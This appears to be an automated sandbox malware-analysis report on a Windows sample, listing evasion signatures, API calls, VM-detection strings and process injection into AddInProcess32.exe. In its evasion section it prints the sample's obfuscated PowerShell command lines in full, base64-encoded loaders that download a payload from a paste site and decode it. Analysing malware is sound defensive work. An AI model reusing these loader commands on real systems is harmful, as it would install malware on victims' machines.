                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040F7E2 Sleep,ExitProcess,8_2_0040F7E2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BA40FC5 sldt word ptr [eax]3_2_00007FFD9BA40FC5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A7D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1666Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1388Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3610Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6222Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4090Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4430Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5272Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 4192Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: foregroundWindowGot 1735Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 3610 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep count: 6222 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228Thread sleep count: 4090 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep count: 4430 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396Thread sleep count: 171 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396Thread sleep time: -85500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400Thread sleep count: 5272 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400Thread sleep time: -15816000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400Thread sleep count: 4192 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7400Thread sleep time: -12576000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1947421542.000002603DC8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                    Source: PING.EXE, 00000005.00000002.1760881316.000002468DF39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaaN
                    Source: powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                    Source: powershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_8-48316
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00443355 mov eax, dword ptr fs:[00000030h]8_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004120B2 GetProcessHeap,HeapFree,8_2_004120B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434BD8 SetUnhandledExceptionFilter,8_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Encrypted powershell cmdline option found
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: D17008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00419662 mouse_event,8_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d